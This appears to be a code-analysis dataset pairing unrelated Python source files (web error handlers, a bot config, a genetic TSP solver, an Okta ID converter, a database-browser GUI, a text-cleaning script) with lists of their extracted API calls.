[((225, 394), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.DEBUG', 'format': '"""[%(asctime)s] %(levelname)s [%(module)s-%(funcName)s()::%(lineno)d] %(message)s"""', 'datefmt': '"""%d/%b/%Y %H:%M:%S"""'}), "(level=logging.DEBUG, format=\n    '[%(asctime)s] %(levelname)s [%(module)s-%(funcName)s()::%(lineno)d] %(message)s'\n    , datefmt='%d/%b/%Y %H:%M:%S')\n", (244, 394), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((439, 466), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (456, 466), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((14734, 14797), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Required: function-name."""'}), "(description='Required: function-name.')\n", (14757, 14797), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((746, 769), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (767, 769), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((797, 839), 'glob.glob', 'glob.glob', (['f"""{self.SOURCE_DIR_PATH}/*.dat"""'], {}), "(f'{self.SOURCE_DIR_PATH}/*.dat')\n", (806, 839), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((1663, 1685), 'os.path.getmtime', 'os.path.getmtime', (['path'], {}), '(path)\n', (1679, 1685), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((1727, 1774), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['file_timestamp'], {}), '(file_timestamp)\n', (1758, 1774), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((2726, 2749), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2747, 2749), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((5232, 5257), 'json.dumps', 'json.dumps', (['count_tracker'], {}), '(count_tracker)\n', (5242, 5257), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((7319, 7370), 'json.dumps', 'json.dumps', (['self.date_dct'], {'sort_keys': '(True)', 'indent': '(2)'}), '(self.date_dct, sort_keys=True, indent=2)\n', (7329, 7370), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((8150, 8173), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (8171, 8173), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((12861, 12887), 'random.randint', 'random.randint', (['(1111)', '(9999)'], {}), '(1111, 9999)\n', (12875, 12887), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((1329, 1390), 'json.dumps', 'json.dumps', (['sorted_filepath_tracker'], {'sort_keys': '(True)', 'indent': '(2)'}), '(sorted_filepath_tracker, sort_keys=True, indent=2)\n', (1339, 1390), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((4977, 5000), 'json.loads', 'json.loads', (['entries_jsn'], {}), '(entries_jsn)\n', (4987, 5000), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((8540, 8592), 'functools.partial', 'partial', (['self.manage_concurrent_updates'], {'n_workers': '(3)'}), '(self.manage_concurrent_updates, n_workers=3)\n', (8547, 8592), False, 'from functools import partial\n'), ((10315, 10334), 'trio.open_nursery', 'trio.open_nursery', ([], {}), '()\n', (10332, 10334), False, 'import asks, trio\n'), ((11610, 11627), 'trio.Semaphore', 'trio.Semaphore', (['(1)'], {}), '(1)\n', (11624, 11627), False, 'import asks, trio\n'), ((11775, 11800), 'trio.sleep', 'trio.sleep', (['self.throttle'], {}), '(self.throttle)\n', (11785, 11800), False, 'import asks, trio\n'), ((12975, 13031), 'asks.post', 'asks.post', (['self.API_UPDATER_URL'], {'data': 'params', 'timeout': '(10)'}), '(self.API_UPDATER_URL, data=params, timeout=10)\n', (12984, 13031), False, 'import asks, trio\n'), ((1162, 1185), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1183, 1185), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((2145, 2168), 'operator.itemgetter', 'itemgetter', (['"""timestamp"""'], {}), "('timestamp')\n", (2155, 2168), False, 'from operator import itemgetter\n'), ((10048, 10116), 'json.dumps', 'json.dumps', (['self.updated_count_tracker_dct'], {'sort_keys': '(True)', 'indent': '(2)'}), '(self.updated_count_tracker_dct, sort_keys=True, indent=2)\n', (10058, 10116), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((13346, 13369), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (13367, 13369), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((14426, 14494), 'json.dumps', 'json.dumps', (['self.updated_count_tracker_dct'], {'sort_keys': '(True)', 'indent': '(2)'}), '(self.updated_count_tracker_dct, sort_keys=True, indent=2)\n', (14436, 14494), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((4305, 4372), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (["entry['timestamp']", '"""%Y-%m-%d %H:%M:%S"""'], {}), "(entry['timestamp'], '%Y-%m-%d %H:%M:%S')\n", (4331, 4372), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((5651, 5709), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['timestamp', '"""%Y-%m-%d %H:%M:%S"""'], {}), "(timestamp, '%Y-%m-%d %H:%M:%S')\n", (5677, 5709), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((5844, 5873), 'pprint.pformat', 'pprint.pformat', (['self.date_dct'], {}), '(self.date_dct)\n', (5858, 5873), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((7496, 7519), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7517, 7519), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n'), ((8641, 8664), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (8662, 8664), False, 'import argparse, datetime, glob, json, logging, os, pprint, random, time\n')]
|
from cookiecutter.main import cookiecutter
def main():
cookiecutter('source-files')#, no_input=True)
if __name__ == '__main__':
main()
|
[
"cookiecutter.main.cookiecutter"
] |
[((60, 88), 'cookiecutter.main.cookiecutter', 'cookiecutter', (['"""source-files"""'], {}), "('source-files')\n", (72, 88), False, 'from cookiecutter.main import cookiecutter\n')]
|
from typing import Union
from fastapi import HTTPException
from fastapi.exceptions import RequestValidationError
from fastapi.openapi.constants import REF_PREFIX
from fastapi.openapi.utils import validation_error_response_definition
from pydantic import ValidationError
from starlette.requests import Request
from starlette.responses import JSONResponse
from starlette.status import HTTP_422_UNPROCESSABLE_ENTITY
async def http_error_handler(_: Request, exc: HTTPException) -> JSONResponse:
return JSONResponse({"errors": [exc.detail]}, status_code=exc.status_code)
async def http422_error_handler(
_: Request,
exc: Union[RequestValidationError, ValidationError],
) -> JSONResponse:
return JSONResponse(
{"errors": exc.errors()},
status_code=HTTP_422_UNPROCESSABLE_ENTITY,
)
validation_error_response_definition["properties"] = {
"errors": {
"title": "Errors",
"type": "array",
"items": {"$ref": "{0}ValidationError".format(REF_PREFIX)},
},
}
|
[
"starlette.responses.JSONResponse"
] |
[((518, 585), 'starlette.responses.JSONResponse', 'JSONResponse', (["{'errors': [exc.detail]}"], {'status_code': 'exc.status_code'}), "({'errors': [exc.detail]}, status_code=exc.status_code)\n", (530, 585), False, 'from starlette.responses import JSONResponse\n')]
|
from nonebot import adapters
from typing import Optional
from pydantic import Field, BaseModel
class Config(BaseModel):
"""
    Telegram adapter configuration class.
    Configuration options:
      - ``webhook_host`` / ``telegram_webhook_host``: host for the webhook
      - ``bot_token`` / ``telegram_bot_token``: bot token
      - ``telegram_command_only`` / ``telegram_command_only``: do not handle non-command messages # not effective yet
      - ``telegram_bot_server_addr`` / ``telegram_bot_server_addr``: Telegram Bot API server address, defaults to the official one
"""
webhook_addr: Optional[str] = Field(default=None, alias="telegram_webhook_host")
bot_token: Optional[str] = Field(default=None, alias="telegram_bot_token")
telegram_adapter_debug: Optional[bool] = Field(default=False, alias="telegram_adapter_debug")
telegram_command_only: Optional[bool] = Field(default=False, alias="telegram_command_only")
telegram_bot_api_server_addr: Optional[str] = Field(default="https://api.telegram.org", alias="telegram_bot_server_addr")
class Config:
extra = "ignore"
allow_population_by_field_name = True
|
[
"pydantic.Field"
] |
[((506, 556), 'pydantic.Field', 'Field', ([], {'default': 'None', 'alias': '"""telegram_webhook_host"""'}), "(default=None, alias='telegram_webhook_host')\n", (511, 556), False, 'from pydantic import Field, BaseModel\n'), ((588, 635), 'pydantic.Field', 'Field', ([], {'default': 'None', 'alias': '"""telegram_bot_token"""'}), "(default=None, alias='telegram_bot_token')\n", (593, 635), False, 'from pydantic import Field, BaseModel\n'), ((681, 733), 'pydantic.Field', 'Field', ([], {'default': '(False)', 'alias': '"""telegram_adapter_debug"""'}), "(default=False, alias='telegram_adapter_debug')\n", (686, 733), False, 'from pydantic import Field, BaseModel\n'), ((778, 829), 'pydantic.Field', 'Field', ([], {'default': '(False)', 'alias': '"""telegram_command_only"""'}), "(default=False, alias='telegram_command_only')\n", (783, 829), False, 'from pydantic import Field, BaseModel\n'), ((880, 955), 'pydantic.Field', 'Field', ([], {'default': '"""https://api.telegram.org"""', 'alias': '"""telegram_bot_server_addr"""'}), "(default='https://api.telegram.org', alias='telegram_bot_server_addr')\n", (885, 955), False, 'from pydantic import Field, BaseModel\n')]
|
import json
from core.utils.cleanOrder import cleanString
yesWords = ["oui", "d'accord", "d accord", "ok", "ça marche", "pourquoi pas", "bien sur"]
noWords = ["non", "pas du tout", "hors de question", "pas question", "impossible", "je refuse"]
def sendAnswer(answer, client):
msg = { "type": "answer", "msg": answer }
jsonMsg = json.dumps(msg)
client.send(str.encode(jsonMsg))
def sendError(answer, client):
msg = { "type": "ERROR", "msg": answer }
jsonMsg = json.dumps(msg)
client.send(str.encode(jsonMsg))
def askConfirmation(confirmMessage, originalRequest, client):
msg = {"type": "askConfirmation", "msg": confirmMessage, "originalRequest": originalRequest}
jsonMsg = json.dumps(msg)
client.send(str.encode(jsonMsg))
def isConfirmation(str):
for word in noWords:
if word in cleanString(str):
return False
for word in yesWords:
if word in cleanString(str):
return True
return False
def recvFromClient(client):
rawOrder = client.recv(1024).decode('utf-8')
#print(rawOrder)
orderJson = json.loads(rawOrder)
if(orderJson == "") :
raise ValueError("Json Vide")
return orderJson
|
[
"json.loads",
"json.dumps",
"core.utils.cleanOrder.cleanString"
] |
[((338, 353), 'json.dumps', 'json.dumps', (['msg'], {}), '(msg)\n', (348, 353), False, 'import json\n'), ((482, 497), 'json.dumps', 'json.dumps', (['msg'], {}), '(msg)\n', (492, 497), False, 'import json\n'), ((710, 725), 'json.dumps', 'json.dumps', (['msg'], {}), '(msg)\n', (720, 725), False, 'import json\n'), ((1096, 1116), 'json.loads', 'json.loads', (['rawOrder'], {}), '(rawOrder)\n', (1106, 1116), False, 'import json\n'), ((833, 849), 'core.utils.cleanOrder.cleanString', 'cleanString', (['str'], {}), '(str)\n', (844, 849), False, 'from core.utils.cleanOrder import cleanString\n'), ((921, 937), 'core.utils.cleanOrder.cleanString', 'cleanString', (['str'], {}), '(str)\n', (932, 937), False, 'from core.utils.cleanOrder import cleanString\n')]
|
"""
Feedback database model
"""
from uuid import UUID
# pylint incorrectly complains about unused import for UniqueConstraint... not sure why
from sqlalchemy.schema import ( # pylint:disable=unused-import
ForeignKey,
UniqueConstraint,
)
from pydantic import Field
from woolgatherer.db_models.base import DBBaseModel
from woolgatherer.models.feedback import FeedbackType
class Feedback(DBBaseModel, constraints=[UniqueConstraint("type", "suggestion_id")]):
"""
This is the db model for a suggestion.
"""
response: str = Field(...)
type: FeedbackType = Field(..., index=True)
suggestion_id: UUID = Field(
..., index=True, foriegn_key=ForeignKey("suggestion.uuid")
)
|
[
"sqlalchemy.schema.UniqueConstraint",
"pydantic.Field",
"sqlalchemy.schema.ForeignKey"
] |
[((549, 559), 'pydantic.Field', 'Field', (['...'], {}), '(...)\n', (554, 559), False, 'from pydantic import Field\n'), ((585, 607), 'pydantic.Field', 'Field', (['...'], {'index': '(True)'}), '(..., index=True)\n', (590, 607), False, 'from pydantic import Field\n'), ((424, 465), 'sqlalchemy.schema.UniqueConstraint', 'UniqueConstraint', (['"""type"""', '"""suggestion_id"""'], {}), "('type', 'suggestion_id')\n", (440, 465), False, 'from sqlalchemy.schema import ForeignKey, UniqueConstraint\n'), ((678, 707), 'sqlalchemy.schema.ForeignKey', 'ForeignKey', (['"""suggestion.uuid"""'], {}), "('suggestion.uuid')\n", (688, 707), False, 'from sqlalchemy.schema import ForeignKey, UniqueConstraint\n')]
|
from RouteManager import RouteManager
from Route import Route
import numpy as np
class GeneticAlgorithmSolver:
def __init__(self, cities, population_size=50, mutation_rate=0.05, tournament_size=5, elitism=True):
self.cities = cities
self.population_size = population_size
self.mutation_rate = mutation_rate
self.tournament_size = tournament_size
self.elitism = elitism
def solve(self, rm):
rm = self.evolve(rm)
for i in range(100):
rm = self.evolve(rm)
return rm
def evolve(self, routes):
'''This function provides general flow to create a new generation
from given population
Input:
routes: RouteManager object that will be evolved
Output:
child: new generation of RouteManager
'''
selected_routes = RouteManager(self.cities,self.population_size) #to store routes in selection state
#SELECTION STATE
for i in range(self.population_size-int(self.elitism)):
#replace existing routes with tournament winners
            #as many as tournament_size participants are chosen randomly
selected_routes.set_route(i, self.tournament(np.random.choice(routes.routes, self.tournament_size)))
##ELITISM PART
child_routes = RouteManager(self.cities,self.population_size) #to store new child routes
if self.elitism: #if elitism then best route will directly pass to next generation
temporary_route = Route(self.cities)
elite_route = routes.find_best_route()
for i in range(len(elite_route)):
temporary_route.assign_city(i,elite_route.get_city(i))
child_routes.set_route(self.population_size-1, temporary_route)
#CROSS-OVER STATE
for i in range(self.population_size-int(self.elitism)):
#replace existing child routes with actually generated ones
#first route is matched with last, second is matched with second from last and so on.
child_routes.set_route(i, self.crossover(selected_routes.get_route(i),selected_routes.get_route(self.population_size-1-i)))
#MUTATION STATE
for i in range(len(child_routes)-int(self.elitism)):
#send each routes to mutation function
self.mutate(child_routes.get_route(i))
return child_routes
def crossover(self, route_1, route_2):
'''This function creates a crossed-over child route from
two given parent routes.
Input:
route_1: first parent route
route_2: second parent route
Output:
child: generated child route
'''
#determining random start and end genes
#which will stay same as in the first parent
a = np.random.rand()
b = np.random.rand()
low_point=int(min(a,b)*len(self.cities))
up_point=int(max(a,b)*len(self.cities))
        child=route_1 #child starts as the first parent; positions outside the copied segment are overwritten below
gen_list=[] #this list stores the cities as in the generated child's order
for i in range(low_point,up_point):
#from randomly generated low to up point cities will stay same
gen_list.append(route_1.get_city(i))
        #subset contains cities that have not been added to gen_list, kept in the second parent's order
subset=[item for item in route_2.route if item not in gen_list]
#add the cities in the subset
for i in range(len(self.cities)):
if i not in range(low_point,up_point):
indx=i if i<low_point else i-(up_point-low_point)
child.assign_city(i,subset[indx])
return child
def mutate(self, route):
        '''This function randomly mutates the genes with
        a given probability
Input:
route: RouteManager object that would mutate
Output:
None
'''
for i in range(len(route)): #each gene can be subject to mutation
            if np.random.rand()<self.mutation_rate: #mutation occurs with the probability of mutation_rate
                #if it does, the given gene is swapped with another randomly chosen gene
swap_indx=int(len(route)*np.random.rand())
city1 = route.get_city(i)
city2 = route.get_city(swap_indx)
route.assign_city(i,city2)
route.assign_city(swap_indx, city1)
return
def tournament(self, routes):
'''This function returns the route with best fitness score
among a set of routes.
Input:
routes: list of routes
Output:
return_route: route that gives best fitness
'''
        best_fitness=0 #initial best score
        tour_winner=routes[0] #fallback so a winner is always defined
        for r in routes:
            if r.calc_fitness()>best_fitness: #update if a better route exists than the current best
best_fitness=r.calc_fitness()
tour_winner=r
return_route = Route(self.cities) #creating the return value
for i in range(len(return_route)):
return_route.assign_city(i,tour_winner.get_city(i))
return return_route
|
[
"numpy.random.rand",
"Route.Route",
"RouteManager.RouteManager",
"numpy.random.choice"
] |
[((866, 913), 'RouteManager.RouteManager', 'RouteManager', (['self.cities', 'self.population_size'], {}), '(self.cities, self.population_size)\n', (878, 913), False, 'from RouteManager import RouteManager\n'), ((1350, 1397), 'RouteManager.RouteManager', 'RouteManager', (['self.cities', 'self.population_size'], {}), '(self.cities, self.population_size)\n', (1362, 1397), False, 'from RouteManager import RouteManager\n'), ((2851, 2867), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (2865, 2867), True, 'import numpy as np\n'), ((2880, 2896), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (2894, 2896), True, 'import numpy as np\n'), ((5063, 5081), 'Route.Route', 'Route', (['self.cities'], {}), '(self.cities)\n', (5068, 5081), False, 'from Route import Route\n'), ((1545, 1563), 'Route.Route', 'Route', (['self.cities'], {}), '(self.cities)\n', (1550, 1563), False, 'from Route import Route\n'), ((4085, 4101), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (4099, 4101), True, 'import numpy as np\n'), ((1238, 1291), 'numpy.random.choice', 'np.random.choice', (['routes.routes', 'self.tournament_size'], {}), '(routes.routes, self.tournament_size)\n', (1254, 1291), True, 'import numpy as np\n'), ((4305, 4321), 'numpy.random.rand', 'np.random.rand', ([], {}), '()\n', (4319, 4321), True, 'import numpy as np\n')]
|
import json
import pytest
from flask import Response
from flask.testing import FlaskClient
class APIResponse(Response):
def json(self):
return json.loads(self.data)
@pytest.fixture()
def test_client(core_app):
core_app.test_client_class = FlaskClient
core_app.response_class = APIResponse
return core_app.test_client()
|
[
"pytest.fixture",
"json.loads"
] |
[((183, 199), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (197, 199), False, 'import pytest\n'), ((158, 179), 'json.loads', 'json.loads', (['self.data'], {}), '(self.data)\n', (168, 179), False, 'import json\n')]
|
"""
--- okta-user-id --
This is a simple module for turning (apparently) base62-encoded Okta user IDs
into UUIDs. It also allows for reversing the UUID to an Okta user ID.
"""
__title__ = 'okta-uuid'
__author__ = '<NAME>'
__email__ = '<EMAIL>'
__version__ = '0.1.0'
import uuid
import base62
class OktaUserId(object):
def __init__(self, uid):
self.__uid = uid
d = base62.decode(uid)
b = d.to_bytes(16, byteorder='little')
        self.__uuid = uuid.UUID(bytes_le=b)
@property
def uid(self):
return self.__uid
@property
def uuid(self):
return self.__uuid
def __eq__(self, other):
return self.uid == other.uid
def __str__(self):
return self.uid
def __repr__(self):
return "OktaUserId('{}')".format(self.uid)
@classmethod
def from_uuid(cls, u, length=20):
"""
Derive an Okta UID from the given UUID, padding the left of the string
ID with zeroes.
"""
b = int.from_bytes(u.bytes_le, byteorder='little')
d = base62.encode(b)
padded = d.zfill(length)
return cls(padded)
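

# A minimal round-trip sketch (the ID below is made up for illustration -- it is
# not a real Okta user, it just has the typical "00u..." shape and 20 characters):
if __name__ == '__main__':
    okta_id = OktaUserId('00u1abcd2efGHIJkl3x4')
    print(okta_id.uuid)
    assert OktaUserId.from_uuid(okta_id.uuid) == okta_id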
|
[
"base62.encode",
"base62.decode",
"uuid.UUID"
] |
[((391, 409), 'base62.decode', 'base62.decode', (['uid'], {}), '(uid)\n', (404, 409), False, 'import base62\n'), ((483, 504), 'uuid.UUID', 'uuid.UUID', ([], {'bytes_le': 'b'}), '(bytes_le=b)\n', (492, 504), False, 'import uuid\n'), ((1072, 1088), 'base62.encode', 'base62.encode', (['b'], {}), '(b)\n', (1085, 1088), False, 'import base62\n')]
|
import dearpygui.dearpygui as dpg
from .window import Window
from . import ConnectionListWindow
class SchemaWindow(Window):
def __init__(self, app, **kwargs):
# fmt: off
super().__init__(
app, 'Текущее подключение', 'main_window', (800, 500),
tag_schema_selector='schema selector', tag_listbox='table list', tag_content='current table',
tag_schema='current schema', tag_handler='table list handler', tag_limit='select_limit',
table_params={
'header_row': True, 'borders_outerH': True, 'borders_innerV': True, 'borders_innerH': True,
'borders_outerV': True, 'resizable': True, 'no_host_extendX': True
}, **kwargs
)
# fmt: on
def construct(self) -> None:
with dpg.group(horizontal=True):
with dpg.group(width=200):
dpg.add_text('Schemas')
dpg.add_combo((), tag=self.tag_schema_selector, callback=self.ui_select_schema)
dpg.add_text('Tables')
dpg.add_listbox((), tag=self.tag_listbox, callback=self.ui_select_table)
with dpg.group():
dpg.add_text('Limit')
dpg.add_input_text(tag='select_limit', default_value='10')
dpg.add_spacer(height=20)
dpg.add_button(label='Отключиться', callback=self.ui_disconnect)
with dpg.tab_bar(label='tabs'):
with dpg.tab(label='content'):
dpg.add_table(tag=self.tag_content, **self.table_params)
with dpg.tab(label='schema'):
dpg.add_table(tag=self.tag_schema, **self.table_params)
def show(self) -> None:
super().show()
dpg.configure_item(self.tag_schema_selector, items=self.app.inspector.get_schema_names())
def ui_disconnect(self) -> None:
ConnectionListWindow().show()
self.app.engine = None
self.app.inspector = None
dpg.delete_item(self.window_id)
self.initiated = False
def ui_select_table(self, sender, table=None):
"""Select table from schema and initiate tab panel"""
dpg.delete_item(self.tag_content, children_only=True)
dpg.delete_item(self.tag_schema, children_only=True)
schema = dpg.get_value(self.tag_schema_selector)
table = table or dpg.get_value(self.tag_listbox)
limit = dpg.get_value(self.tag_limit)
if not table:
return
columns = self.app.inspector.get_columns(table, schema=schema)
for c in columns:
dpg.add_table_column(label=c['name'], parent=self.tag_content)
for column in ['param', 'type', 'nullable', 'default', 'foreign key']:
dpg.add_table_column(label=column, parent=self.tag_schema)
with self.app.engine.connect() as conn:
for row in conn.execute(f'select * from {table} limit {limit}'):
with dpg.table_row(parent=self.tag_content):
for e in row:
dpg.add_text(e)
foreign_keys = {
i['constrained_columns'][0]: '{referred_schema}.{referred_table}({referred_columns[0]})'.format(**i)
for i in self.app.inspector.get_foreign_keys(table, schema=schema)
}
for item in columns:
with dpg.table_row(parent=self.tag_schema):
dpg.add_text(item['name'])
dpg.add_text(item['type'])
dpg.add_text(item['nullable'])
dpg.add_text(item['default'])
dpg.add_text(foreign_keys.get(item['name']))
def ui_select_schema(self, sender, schema):
"""Select schema from schemas list."""
dpg.configure_item(self.tag_listbox, items=sorted(self.app.inspector.get_table_names(schema=schema)))
        self.ui_select_table(sender)  # because the listbox has a selected item but doesn't trigger the callback itself
|
[
"dearpygui.dearpygui.add_input_text",
"dearpygui.dearpygui.add_text",
"dearpygui.dearpygui.add_button",
"dearpygui.dearpygui.group",
"dearpygui.dearpygui.get_value",
"dearpygui.dearpygui.delete_item",
"dearpygui.dearpygui.add_combo",
"dearpygui.dearpygui.add_spacer",
"dearpygui.dearpygui.tab",
"dearpygui.dearpygui.table_row",
"dearpygui.dearpygui.add_table",
"dearpygui.dearpygui.add_listbox",
"dearpygui.dearpygui.tab_bar",
"dearpygui.dearpygui.add_table_column"
] |
[((2008, 2039), 'dearpygui.dearpygui.delete_item', 'dpg.delete_item', (['self.window_id'], {}), '(self.window_id)\n', (2023, 2039), True, 'import dearpygui.dearpygui as dpg\n'), ((2194, 2247), 'dearpygui.dearpygui.delete_item', 'dpg.delete_item', (['self.tag_content'], {'children_only': '(True)'}), '(self.tag_content, children_only=True)\n', (2209, 2247), True, 'import dearpygui.dearpygui as dpg\n'), ((2256, 2308), 'dearpygui.dearpygui.delete_item', 'dpg.delete_item', (['self.tag_schema'], {'children_only': '(True)'}), '(self.tag_schema, children_only=True)\n', (2271, 2308), True, 'import dearpygui.dearpygui as dpg\n'), ((2327, 2366), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['self.tag_schema_selector'], {}), '(self.tag_schema_selector)\n', (2340, 2366), True, 'import dearpygui.dearpygui as dpg\n'), ((2440, 2469), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['self.tag_limit'], {}), '(self.tag_limit)\n', (2453, 2469), True, 'import dearpygui.dearpygui as dpg\n'), ((802, 828), 'dearpygui.dearpygui.group', 'dpg.group', ([], {'horizontal': '(True)'}), '(horizontal=True)\n', (811, 828), True, 'import dearpygui.dearpygui as dpg\n'), ((2392, 2423), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['self.tag_listbox'], {}), '(self.tag_listbox)\n', (2405, 2423), True, 'import dearpygui.dearpygui as dpg\n'), ((2622, 2684), 'dearpygui.dearpygui.add_table_column', 'dpg.add_table_column', ([], {'label': "c['name']", 'parent': 'self.tag_content'}), "(label=c['name'], parent=self.tag_content)\n", (2642, 2684), True, 'import dearpygui.dearpygui as dpg\n'), ((2776, 2834), 'dearpygui.dearpygui.add_table_column', 'dpg.add_table_column', ([], {'label': 'column', 'parent': 'self.tag_schema'}), '(label=column, parent=self.tag_schema)\n', (2796, 2834), True, 'import dearpygui.dearpygui as dpg\n'), ((847, 867), 'dearpygui.dearpygui.group', 'dpg.group', ([], {'width': '(200)'}), '(width=200)\n', (856, 867), True, 'import dearpygui.dearpygui as dpg\n'), ((885, 908), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (['"""Schemas"""'], {}), "('Schemas')\n", (897, 908), True, 'import dearpygui.dearpygui as dpg\n'), ((925, 1004), 'dearpygui.dearpygui.add_combo', 'dpg.add_combo', (['()'], {'tag': 'self.tag_schema_selector', 'callback': 'self.ui_select_schema'}), '((), tag=self.tag_schema_selector, callback=self.ui_select_schema)\n', (938, 1004), True, 'import dearpygui.dearpygui as dpg\n'), ((1021, 1043), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (['"""Tables"""'], {}), "('Tables')\n", (1033, 1043), True, 'import dearpygui.dearpygui as dpg\n'), ((1060, 1132), 'dearpygui.dearpygui.add_listbox', 'dpg.add_listbox', (['()'], {'tag': 'self.tag_listbox', 'callback': 'self.ui_select_table'}), '((), tag=self.tag_listbox, callback=self.ui_select_table)\n', (1075, 1132), True, 'import dearpygui.dearpygui as dpg\n'), ((1436, 1461), 'dearpygui.dearpygui.tab_bar', 'dpg.tab_bar', ([], {'label': '"""tabs"""'}), "(label='tabs')\n", (1447, 1461), True, 'import dearpygui.dearpygui as dpg\n'), ((1154, 1165), 'dearpygui.dearpygui.group', 'dpg.group', ([], {}), '()\n', (1163, 1165), True, 'import dearpygui.dearpygui as dpg\n'), ((1187, 1208), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (['"""Limit"""'], {}), "('Limit')\n", (1199, 1208), True, 'import dearpygui.dearpygui as dpg\n'), ((1229, 1287), 'dearpygui.dearpygui.add_input_text', 'dpg.add_input_text', ([], {'tag': '"""select_limit"""', 'default_value': '"""10"""'}), "(tag='select_limit', default_value='10')\n", (1247, 1287), True, 'import dearpygui.dearpygui 
as dpg\n'), ((1308, 1333), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {'height': '(20)'}), '(height=20)\n', (1322, 1333), True, 'import dearpygui.dearpygui as dpg\n'), ((1354, 1418), 'dearpygui.dearpygui.add_button', 'dpg.add_button', ([], {'label': '"""Отключиться"""', 'callback': 'self.ui_disconnect'}), "(label='Отключиться', callback=self.ui_disconnect)\n", (1368, 1418), True, 'import dearpygui.dearpygui as dpg\n'), ((1484, 1508), 'dearpygui.dearpygui.tab', 'dpg.tab', ([], {'label': '"""content"""'}), "(label='content')\n", (1491, 1508), True, 'import dearpygui.dearpygui as dpg\n'), ((1530, 1586), 'dearpygui.dearpygui.add_table', 'dpg.add_table', ([], {'tag': 'self.tag_content'}), '(tag=self.tag_content, **self.table_params)\n', (1543, 1586), True, 'import dearpygui.dearpygui as dpg\n'), ((1608, 1631), 'dearpygui.dearpygui.tab', 'dpg.tab', ([], {'label': '"""schema"""'}), "(label='schema')\n", (1615, 1631), True, 'import dearpygui.dearpygui as dpg\n'), ((1653, 1708), 'dearpygui.dearpygui.add_table', 'dpg.add_table', ([], {'tag': 'self.tag_schema'}), '(tag=self.tag_schema, **self.table_params)\n', (1666, 1708), True, 'import dearpygui.dearpygui as dpg\n'), ((2982, 3020), 'dearpygui.dearpygui.table_row', 'dpg.table_row', ([], {'parent': 'self.tag_content'}), '(parent=self.tag_content)\n', (2995, 3020), True, 'import dearpygui.dearpygui as dpg\n'), ((3394, 3431), 'dearpygui.dearpygui.table_row', 'dpg.table_row', ([], {'parent': 'self.tag_schema'}), '(parent=self.tag_schema)\n', (3407, 3431), True, 'import dearpygui.dearpygui as dpg\n'), ((3453, 3479), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (["item['name']"], {}), "(item['name'])\n", (3465, 3479), True, 'import dearpygui.dearpygui as dpg\n'), ((3500, 3526), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (["item['type']"], {}), "(item['type'])\n", (3512, 3526), True, 'import dearpygui.dearpygui as dpg\n'), ((3547, 3577), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (["item['nullable']"], {}), "(item['nullable'])\n", (3559, 3577), True, 'import dearpygui.dearpygui as dpg\n'), ((3598, 3627), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (["item['default']"], {}), "(item['default'])\n", (3610, 3627), True, 'import dearpygui.dearpygui as dpg\n'), ((3080, 3095), 'dearpygui.dearpygui.add_text', 'dpg.add_text', (['e'], {}), '(e)\n', (3092, 3095), True, 'import dearpygui.dearpygui as dpg\n')]
|
#!/usr/bin/env python3
####################################################################################
# Script is not in use, since this is no longer in the main corpus
# Cleaning up parliament speech files
# Output is an UTF-8 file with one article per line
####################################################################################
import sys, glob, os, re, argparse
import pandas as pd
def main(args):
minimum_number_of_words_in_an_article = 1
all_articles = ""
valid_article_count = 0
#Read the file
df = pd.read_csv(args.input_file, encoding='utf-8', dtype='string')
for index, row in df.iterrows():
article = row['text']
if len(str(article).split()) >= minimum_number_of_words_in_an_article:
valid_article_count += 1
all_articles += str(article) + '\n'
#Uncomment to run a test on part of the dataset
#if index > 100:
# break
